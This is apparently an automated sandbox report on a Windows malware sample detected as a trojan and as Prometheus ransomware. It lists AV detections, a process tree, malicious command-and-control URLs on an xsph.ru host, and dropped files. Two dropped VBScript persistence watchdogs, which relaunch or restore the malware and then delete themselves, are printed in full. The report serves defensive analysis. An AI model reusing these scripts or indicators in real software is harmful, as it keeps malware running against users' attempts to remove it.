      dropped: edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs (ASCII)
      dropped: a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs (ASCII)
      wscript.exe
        zTShuhFeOCWKXCInUCSTgJmE.exe
          dropped: 91745221-1208-4818-9185-e92567cf8b4d.vbs (ASCII)
          dropped: 5607663c-c622-426c-855c-ef5fb85dae90.vbs (ASCII)
          wscript.exe
            zTShuhFeOCWKXCInUCSTgJmE.exe
              dropped: 9e72009f-739b-4ea4-b505-4e802e14614f.vbs (ASCII)
              dropped: 8636c2ce-b0e0-4557-b01c-75132397eb84.vbs (ASCII)
              wscript.exe
                zTShuhFeOCWKXCInUCSTgJmE.exe
                  dropped: c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs (ASCII)
                  dropped: 1aed32cf-2de1-4530-92b6-4347a499f45a.vbs (ASCII)
                  wscript.exe
              wscript.exe
          wscript.exe
      wscript.exe
  wscript.exe
zTShuhFeOCWKXCInUCSTgJmE.exe  [Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file]

Antivirus detection, submitted sample:

Source | Detection | Scanner | Label
adKGhCOOzg.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
adKGhCOOzg.exe | 100% | Avira | VBS/Runner.VPG
adKGhCOOzg.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files:

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs | 100% | Avira | VBS/Runner.VPXJ
C:\portcontainerRef\myQbMgAKm.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs | 100% | Avira | VBS/Runner.VPXJ
C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs | 100% | Avira | VBS/Runner.VPXJ
C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs | 100% | Avira | VBS/Runner.VPXJ
C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs | 100% | Avira | VBS/Starter.VPVT
C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs | 100% | Avira | VBS/Runner.VPXJ
C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs | 100% | Avira | VBS/Starter.VPVT
C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs | 100% | Avira | VBS/Runner.VPXJ
C:\portcontainerRef\SurrogateContainerAgent.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs | 100% | Avira | VBS/Starter.VPVT
C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs | 100% | Avira | VBS/Starter.VPVT
C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs | 100% | Avira | VBS/Starter.VPVT
C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs | 100% | Avira | VBS/Starter.VPVT
C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | 100% | Joe Sandbox ML |
C:\portcontainerRef\SurrogateContainerAgent.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\portcontainerRef\SurrogateContainerAgent.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            No Antivirus matches
            No Antivirus matches
Antivirus detection, URLs:

Source | Detection | Scanner | Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://index.from.sh/pages/game.html | 0% | Avira URL Cloud | safe
https://cp.sprinthost.ru | 0% | Avira URL Cloud | safe
http://a1025223.xsph.ru/ | 100% | Avira URL Cloud | malware
https://cp.sprinthost.ru/auth/login | 0% | Avira URL Cloud | safe
http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad0 | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtr | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40 | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme | 100% | Avira URL Cloud | malware
http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469 | 100% | Avira URL Cloud | malware
Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
a1025223.xsph.ru | 141.8.194.149 | true | true | | unknown
Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 | true | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT | true | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF | true | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz | true | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme | true | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc | true | Avira URL Cloud: malware | unknown
URLs found in memory and binary data (Source lists the process whose memory dumps contained the string):

Name | Source | Malicious | Antivirus Detection | Reputation
https://cp.sprinthost.ru | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: safe | unknown
https://index.from.sh/pages/game.html | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: safe | unknown
http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtr | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad0 | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: malware | unknown
https://cp.sprinthost.ru/auth/login | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: safe | unknown
http://a1025223.xsph.ru/ | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40 | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SurrogateContainerAgent.exe, zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | URL Reputation: safe | unknown
http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: malware | unknown
http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469 | zTShuhFeOCWKXCInUCSTgJmE.exe (process memory dumps) | false | Avira URL Cloud: malware | unknown
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
141.8.194.149 | a1025223.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | true
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1520355
              Start date and time:2024-09-27 08:41:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 33s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:45
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:adKGhCOOzg.exe
              renamed because original name is a hash value
              Original Sample Name:3b5ae0315b4623a6bd2c711bc8b8e28f.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@61/23@1/1
              EGA Information:
              • Successful, ratio: 10%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target SurrogateContainerAgent.exe, PID 7676 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 1868 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 2156 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 3420 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 3592 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 4460 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 5336 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 5376 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 7108 because it is empty
              • Not all processes were analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: adKGhCOOzg.exe
              Time | Type | Description
              02:42:23 | API Interceptor | 24x Sleep call for process: zTShuhFeOCWKXCInUCSTgJmE.exe modified
              07:42:15 | Task Scheduler | Run new task: zTShuhFeOCWKXCInUCSTgJmE path: "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"
              07:42:15 | Task Scheduler | Run new task: zTShuhFeOCWKXCInUCSTgJmEz path: "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"
              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
              141.8.194.149 | 2ZJuaB7CQ4.exe | Get hash | malicious | DCRat | Browse |
               | 5P9EdUgv5r.exe | Get hash | malicious | DCRat | Browse |
               | ONkN42VBrA.exe | Get hash | malicious | DCRat | Browse |
               | W1jPemW7dh.exe | Get hash | malicious | DCRat | Browse |
               | 5GOuTtZoQn.exe | Get hash | malicious | LummaC, Poverty Stealer, SmokeLoader | Browse |
               | SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exe | Get hash | malicious | LummaC, Poverty Stealer, SmokeLoader | Browse |
               | ZM7nD5Un8l.exe | Get hash | malicious | DCRat | Browse |
               | zMX3ObXlR6.exe | Get hash | malicious | DCRat | Browse |
               | jbLwhEMdSh.exe | Get hash | malicious | DCRat | Browse |
               | Ryf8vHLcLt.exe | Get hash | malicious | DCRat | Browse |
                                  No context
                                   Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                   SPRINTHOSTRU | http://clck.ru/3DSS5H | Get hash | malicious | Unknown | Browse | 141.8.192.26
                                    | http://a1034295.xsph.ru/vew/ye/worke/ | Get hash | malicious | Unknown | Browse | 141.8.192.26
                                    | http://a1034295.xsph.ru/favicon.ico | Get hash | malicious | Unknown | Browse | 141.8.192.26
                                    | https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg | Get hash | malicious | Unknown | Browse | 141.8.192.26
                                    | https://ldubsinvesting.com/a/g/bqcfb/bwviud/YW1hbmRhLnlhcEBleGlzLXRlY2guY29t | Get hash | malicious | HTMLPhisher | Browse | 141.8.192.163
                                    | http://a1027421.xsph.ru/suregod/dns-2/login.htm#3mail@b.c | Get hash | malicious | HTMLPhisher | Browse | 141.8.192.163
                                    | bjFmo8x9rR.exe | Get hash | malicious | DCRat | Browse | 141.8.192.126
                                    | c8dafd28b404b8a668f7a2838e63bc6a62dd8ab51accf.exe | Get hash | malicious | DCRat | Browse | 141.8.192.103
                                    | V7jRHFyQyF.exe | Get hash | malicious | DCRat | Browse | 141.8.192.126
                                    | zcBWmDWfw5.exe | Get hash | malicious | DCRat | Browse | 141.8.193.236
                                  No context
                                  No context
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1915
                                  Entropy (8bit):5.363869398054153
                                  Encrypted:false
                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
                                  MD5:5D3E8414C47C0F4A064FA0043789EC3E
                                  SHA1:CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
                                  SHA-256:4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
                                  SHA-512:74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1673
                                  Entropy (8bit):5.358592927981826
                                  Encrypted:false
                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHj:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1D
                                  MD5:F291C90FAC67ABE67847C0904F5FF473
                                  SHA1:62116C0BF75FB9983D24B6E8D4BBA1A46272BD68
                                  SHA-256:7B7D839D62C6ACC64FEA99510F7C9BD1D71008DC7573ECE96474BC24F5876D1F
                                  SHA-512:B99CA9739B59E679B00777DD0C2F77CB0258F79959D0B99BA10139B6C3C3D692859196101BCFC1919933F083153AA2D72976E514F725F909CA2EDD2397C05F9A
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.265707396582211
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6KDjMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbT:9AnyHfCATDjI5pD/AEmHob/uhEjdxWgr
                                  MD5:98FAB60BBFF6A9D6F8B4CCD99526BF6F
                                  SHA1:6DDE527E85C0D7C008B802B968B3F3BA88B0E065
                                  SHA-256:871159B9D47E8AE58AFDCBC1D82E2AD86920C395E5C58F2FB87F1D84B661A424
                                  SHA-512:3C46BEC1F87DAFA3BD04B001EE3A8B74EA59FBA2D20BC1B69C08A4056C92A92B25A8D37F4C5E87940B1E82F6FCFE2A2D7C0349C9DAD6BBDA8130EAA064D7B535
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "3592"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
